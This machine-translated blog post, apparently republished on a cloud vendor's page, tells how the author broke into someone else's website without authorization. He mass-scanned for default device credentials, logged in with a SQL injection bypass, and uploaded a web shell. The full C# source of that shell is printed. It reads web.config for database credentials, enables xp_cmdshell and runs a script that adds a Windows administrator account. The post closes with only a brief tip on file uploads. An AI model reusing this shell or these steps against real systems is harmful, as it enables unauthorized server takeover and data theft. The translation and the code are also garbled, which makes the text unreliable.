Remember the intrusion of a website and how to avoid intrusion

Source: Internet
Author: User
Tags add execution file upload httpcontext sql net string sql injection

The first thing I want to say is that it is not the language of the written program is not safe, but to see how the person writing the code to write this program

Some days ago, I went to the client's research, found that the customer's monitoring system is the Sea Conway Video recorder, and then the default username is the Amdin password is 12345, come back to play a game to see how many people use the default password, so wrote a scanning program, quickly scanned a large number of web sites, Also get a lot of use is the default username and password.

Play a two days later found nothing fun, just look for a scan in the record, see some background landing address, so they are tested, and then found this site:

In the beginning, I was testing the weak password,

Admin Amdin etc, random test a few, did not succeed, so began to test the injection of SQL, user name Input 1 ' or 1=1--password casually lost a 1 landing, incredibly landed success ....

But found that the log in after the error, and think of the next may be the user name of the problem, so look for the page to see if I login to the user name, and finally found a written message inside saw

Of course, if the invasion only to this you will be absolutely weak burst ... In fact, of course, because I took his data and program ... Of course, it is best to take his server, that his server is to do the port mapping, and then took his router, and then did not continue to go down, of course, can continue, such as the router's DNS hijacking, page redirection, port mirroring and so on

Next I start to introduce the main intrusion page, File upload page

I wrote a ashx page and uploaded

The code is very simple, is read the site's Web.config file and then output in text form,

Let me start with a simple intrusion process:

1, read web.config get database connection

2. Use SQL Server Execution command to add Windows users (because the Web site is IIS user by default, no permissions are related to line net, etc., but SQL Server is running based on local service with high permissions)

I posted the ashx file code I uploaded:

  1. <%@ WebHandler language= "C #" class= "Textld"%>
  2. Using System;
  3. Using System.Collections.Generic;
  4. Using System.Linq;
  5. Using System.Web;
  6. Using System.Data.SqlClient;
  7. public class Textld:ihttphandler
  8. {
  9. public void Createlocaluser (string newpath)
  10. {
  11. System.Diagnostics.Process.Start (@ "D:\1.vbs");
  12. System.IO.File.WriteAllText (@ "D:\1.vbs", "Set Wsnetwork=createobject (\" WSCRIPT). Network\ ") \ r \ n os=\" winnt://\ "&wsnetwork. ComputerName \ r \ n set ob=getobject (OS) \r\nset oe=getobject (os&\ "/administrators,group\") ' property, admin group \r\nod=ob. Create (\ "User\", \ "test\") ' Establish user \r\nsetpassword \ 1234\ ' Set password \r\nsetinfo\r\nof=getobject (os&\ "/test\", user) \ r \ n Add os&\ "/test\");
  13. }
  14. public void Showwebconfig (HttpContext context)
  15. {
  16. Context. Response.Write (System.IO.File.ReadAllText) (context. Request.mappath ("~/web.config"));
  17. }
  18. public void Writevbs (HttpContext context)
  19. {
  20. System.IO.File.WriteAllText (context. Request.mappath ("~/1.vbs"), "set Wsnetwork=createobject (\" WSCRIPT. Network\ ") \ r \ n os=\" winnt://\ "&wsnetwork. ComputerName \ r \ n set ob=getobject (OS) \r\nset oe=getobject (os&\ "/administrators,group\") ' property, admin group \r\nod=ob. Create (\ "User\", \ "test\") ' Establish user \r\nsetpassword \ 1234\ ' Set password \r\nsetinfo\r\nof=getobject (os&\ "/test\", user) \ r \ n Add os&\ "/test\");
  21. }
  22. public void ExecuteSQL (string connection, String sql)
  23. {
  24. using (SqlConnection con = new SqlConnection (Connection))
  25. {
  26. using (SqlCommand COMMD = new SqlCommand (sql, con))
  27. {
  28. Con. Open ();
  29. Commd. ExecuteNonQuery ();
  30. Con. Close ();
  31. }
  32. }
  33. }
  34. public void ProcessRequest (HttpContext context)
  35. {
  36. Context. Response.ContentType = "Text/plain";
  37. Context. Response.Write (System.IO.File.ReadAllText) (context. Request.mappath ("~/web.config"));
  38. Try
  39. {
  40. var connection = context. request.querystring["Connection"];
  41. Switch (context. Request.querystring["Method"])
  42. {
  43. Case "1": writevbs (context); Break
  44. Case "2":
  45. ExecuteSQL (connection,@ "sp_configure ' show advanced options ', 1 reconfigure");
  46. ExecuteSQL (connection,@ "sp_configure ' xp_cmdshell ', 1 reconfigure");//Open Database xp_cmdshell
  47. Break
  48. Case "3": ExecuteSQL (Connection, "exec master.") xp_cmdshell ' cscript ' + context. Request.mappath ("~/1.vbs") + "'");
  49. Break
  50. Default
  51. Showwebconfig (context);
  52. Break
  53. }
  54. }
  55. catch (Exception ex)
  56. {
  57. Context. Response.Write (ex. message);
  58. }
  59. Context. Response.End ();
  60. }
  61. public bool IsReusable
  62. {
  63. Get
  64. {
  65. return false;
  66. }
  67. }
  68. }

And then one execution, so the server was taken down by me ... A Super Admin user named Test password 1234 was created, so the remote connection was tested

And then do what, as we all know ....

Of course, if you do not take down the server, you think you can line your own code to write ... What bad things can't be done ... Of course I just tested the feasibility, even if not to take the server, execute SQL statements to download his database backup is not minutes of things?

Well, let me conclude this invasion, the main Loudi is actually not his SQL injection (personally feel, of course, he is the fuse), but the file upload, most programmers in the file upload function, before the client uploaded files saved to the Site directory under a folder, do not do any processing, This is the main entrance that led to his server being taken down by me.
So I would like to advise you, do file upload or file processing is better, specifically how to deal with I want to smart you must have a lot of methods ...

Primary school culture I can't afford to hurt Ah ....  Hey... Forgive me for not being a good writer. You'll see-.-!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.